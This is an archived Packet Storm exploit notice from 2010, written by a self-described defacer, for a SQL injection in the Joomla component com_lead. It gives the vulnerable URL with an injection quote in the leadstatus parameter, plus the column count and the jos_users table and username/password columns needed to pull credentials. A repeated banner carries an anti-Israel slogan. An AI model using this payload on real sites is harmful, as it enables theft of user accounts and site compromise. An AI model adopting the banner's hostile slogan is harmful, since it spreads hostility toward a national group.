Joomla Lead SQL Injection

2010-06-04T00:00:00
ID PACKETSTORM:90281
Type packetstorm
Reporter ByEge
Modified 2010-06-04T00:00:00

Description

                                        
                                            `  
  
  
[TR] Title: Joomla Component com_lead SQL Injection   
  
[TR] Date: 03.06.2010  
  
[TR] Author: ByEge  
  
[TR] Homepage: byege.blogspot.com  
  
[TR] Vendor: http://www.leadya.co.il/  
  
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>  
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>  
  
  
[TR] ExploiT :  
  
[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'   
  
[TR] column number : 14   
[TR] column name : username , password  
[TR] table name : jos_users  
  
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>  
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>  
  
[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN  
  
_________________________________________________________________  
Hotmail: Ücretsiz, güvenilir ve zengin e-posta servisi.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`